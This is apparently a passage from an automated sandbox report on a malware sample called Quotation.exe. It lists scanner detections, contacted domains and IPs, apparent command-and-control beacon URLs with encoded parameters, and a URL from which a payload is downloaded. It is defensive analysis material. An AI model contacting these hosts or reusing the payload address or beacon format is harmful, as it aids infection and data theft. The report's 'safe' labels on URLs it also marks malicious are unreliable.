        13.2.control.exe.4dd3814.3.unpack100%AviraTR/Patched.Ren.GenDownload File
        14.2.firefox.exe.129e3814.0.unpack100%AviraTR/Patched.Ren.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        td-ccm-168-233.wixdns.net0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.dexmart.xyz/d91r/0%Avira URL Cloudsafe
        http://www.texasgent.comwww.brightfms.com0%Avira URL Cloudsafe
        http://www.solya-shop.com/d91r/0%Avira URL Cloudsafe
        http://www.interactive-media.ru/d91r/0%Avira URL Cloudsafe
        http://www.eta-trader.netwww.funvacayflorida.com0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.decoraptor.store/d91r/0%Avira URL Cloudsafe
        http://www.brightfms.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK0%Avira URL Cloudsafe
        http://www.184411.com0%Avira URL Cloudsafe
        http://www.cactus-market.ru/d91r/0%Avira URL Cloudsafe
        http://www.b-tek.media/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://schemas.microsoft.c0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
        http://www.184411.com/d91r/0%Avira URL Cloudsafe
        http://www.julesgifts.co.ukwww.aznqmd.com0%Avira URL Cloudsafe
        http://www.b-tek.media/d91r/0%Avira URL Cloudsafe
        http://www.rt66omm.com0%Avira URL Cloudsafe
        http://www.eta-trader.net/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.texasgent.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK0%Avira URL Cloudsafe
        http://www.julesgifts.co.uk/d91r/0%Avira URL Cloudsafe
        http://www.rt66omm.com/d91r/0%Avira URL Cloudsafe
        http://www.maxhaidt.com/d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.184411.com/d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.ghostdyes.net/d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.dexmart.xyzwww.finelinetackdirect.com0%Avira URL Cloudsafe
        http://www.eta-trader.net0%Avira URL Cloudsafe
        http://www.funvacayflorida.com/d91r/0%Avira URL Cloudsafe
        http://www.ghostdyes.net/d91r/0%Avira URL Cloudsafe
        http://www.texasgent.com/d91r/0%Avira URL Cloudsafe
        http://www.solya-shop.com0%Avira URL Cloudsafe
        http://www.solya-shop.comwww.buymyenergy.com0%Avira URL Cloudsafe
        http://www.aznqmd.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.finelinetackdirect.comwww.maxhaidt.com0%Avira URL Cloudsafe
        http://www.brightfms.comwww.eta-trader.net0%Avira URL Cloudsafe
        https://www.wittofitentertainment.com/kGQffjENy187.binZ0%Avira URL Cloudsafe
        http://www.qx386.top0%Avira URL Cloudsafe
        http://www.ghostdyes.net0%Avira URL Cloudsafe
        http://www.b-tek.mediawww.dexmart.xyz0%Avira URL Cloudsafe
        https://www.wittofitentertainment.com/kGQffjENy187.binR0%Avira URL Cloudsafe
        http://www.decoraptor.store/d91r/_w7xz=bR5Glu0%Avira URL Cloudsafe
        http://www.interactive-media.ru/d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn0%Avira URL Cloudsafe
        https://solya-shop.com/d91r/?z4=7PV8upFW6FVa3k/MU0%Avira URL Cloudsafe
        http://www.dexmart.xyz/d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.flaviosilva.online0%Avira URL Cloudsafe
        http://www.texasgent.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.cactus-market.ru0%Avira URL Cloudsafe
        http://www.brightfms.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.funvacayflorida.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.brightfms.com0%Avira URL Cloudsafe
        http://www.buymyenergy.comwww.184411.com0%Avira URL Cloudsafe
        http://www.cardinialethanol.com/d91r/0%Avira URL Cloudsafe
        http://www.buymyenergy.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.flaviosilva.onlinewww.solya-shop.com0%Avira URL Cloudsafe
        https://www.wittofitentertainment.com/kGQffjENy187.bin00%Avira URL Cloudsafe
        http://www.maxhaidt.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.julesgifts.co.uk0%Avira URL Cloudsafe
        http://www.buymyenergy.com0%Avira URL Cloudsafe
        http://www.cardinialethanol.com0%Avira URL Cloudsafe
        http://23.83.160.2:88/tz.php?ref=0%Avira URL Cloudsafe
        http://www.aznqmd.com0%Avira URL Cloudsafe
        http://www.dexmart.xyz/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.flaviosilva.online/d91r/0%Avira URL Cloudsafe
        http://www.solya-shop.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.buymyenergy.com
        		45.194.145.38
        		truetrue
          		unknown
          www.cardinialethanol.com
          		198.58.118.167
          		truetrue
            		unknown
            td-ccm-168-233.wixdns.net
            		34.117.168.233
            		truetrueunknown
            eta-trader.net
            		2.57.90.16
            		truetrue
              		unknown
              bb.zhanghonghong.com
              		154.215.156.6
              		truetrue
                		unknown
                www.solya-shop.com
                		217.160.0.217
                		truetrue
                  		unknown
                  www.funvacayflorida.com
                  		208.91.197.91
                  		truetrue
                    		unknown
                    www.aznqmd.com
                    		23.83.160.9
                    		truetrue
                      		unknown
                      www.b-tek.media
                      		91.184.0.24
                      		truetrue
                        		unknown
                        www.dexmart.xyz
                        		199.192.26.35
                        		truetrue
                          		unknown
                          www.texasgent.com
                          		81.17.29.148
                          		truetrue
                            		unknown
                            www.maxhaidt.com
                            		172.67.212.220
                            		truetrue
                              		unknown
                              www.wittofitentertainment.com
                              		162.240.73.101
                              		truefalse
                                		unknown
                                flaviosilva.online
                                		2.57.90.16
                                		truetrue
                                  		unknown
                                  www.interactive-media.ru
                                  		88.212.206.251
                                  		truetrue
                                    		unknown
                                    www.brightfms.com
                                    		81.17.18.196
                                    		truetrue
                                      		unknown
                                      www.flaviosilva.online
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.184411.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.eta-trader.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.finelinetackdirect.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.ghostdyes.net
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.solya-shop.com/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dexmart.xyz/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.184411.com/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.b-tek.media/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.184411.com/d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLntrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.maxhaidt.com/d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLntrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ghostdyes.net/d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLntrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ghostdyes.net/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.funvacayflorida.com/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.texasgent.com/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.interactive-media.ru/d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLntrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dexmart.xyz/d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLntrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.cardinialethanol.com/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.flaviosilva.online/d91r/true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.eta-trader.netwww.funvacayflorida.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/chrome_newtabcontrol.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drfalse
                                                  		high
                                                  https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcontrol.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drfalse
                                                    		high
                                                    http://www.184411.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.texasgent.comwww.brightfms.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drfalse
                                                      		high
                                                      http://www.brightfms.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKexplorer.exe, 0000000C.00000002.26450887427.0000000014FA0000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000006600000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cactus-market.ru/d91r/explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.interactive-media.ru/d91r/explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.decoraptor.store/d91r/explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.b-tek.media/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.microsoft.cexplorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 0000000C.00000000.22673664093.000000001021C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDQuotation.exe, 0000000A.00000001.21847480465.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                            		high
                                                            https://android.notify.windows.com/iOSFexplorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.gopher.ftp://ftp.Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.julesgifts.co.ukwww.aznqmd.comexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.rt66omm.comexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.texasgent.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKexplorer.exe, 0000000C.00000002.26450887427.0000000014E0E000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000646E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.eta-trader.net/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.julesgifts.co.uk/d91r/explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.rt66omm.com/d91r/explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drfalse
                                                                    		high
                                                                    https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindowfirefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.dexmart.xyzwww.finelinetackdirect.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.eta-trader.netexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssexplorer.exe, 0000000C.00000002.26450887427.0000000014634000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005C94000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.webnames.ru/wn/img/logo-horizontal.svgexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.solya-shop.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://aka.ms/odirm3explorer.exe, 0000000C.00000002.26418329458.0000000008F53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.solya-shop.comwww.buymyenergy.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://word.office.comexplorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.finelinetackdirect.comwww.maxhaidt.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://api.msn.com/?Imexplorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://trade.webnames.ruexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.aznqmd.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.brightfms.comwww.eta-trader.netexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.qx386.topexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.wittofitentertainment.com/kGQffjENy187.binZQuotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drfalse
                                                                                          		high
                                                                                          http://nsis.sf.net/NSIS_ErrorErrorQuotation.exefalse
                                                                                            		high
                                                                                            http://www.ghostdyes.netexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.b-tek.mediawww.dexmart.xyzexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.wittofitentertainment.com/kGQffjENy187.binRQuotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.symauth.com/cps0(Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drfalse
                                                                                              		high
                                                                                              https://outlook.comexplorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_cexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.decoraptor.store/d91r/_w7xz=bR5Gluexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://solya-shop.com/d91r/?z4=7PV8upFW6FVa3k/MUexplorer.exe, 0000000C.00000002.26450887427.0000000013FEC000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000564C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
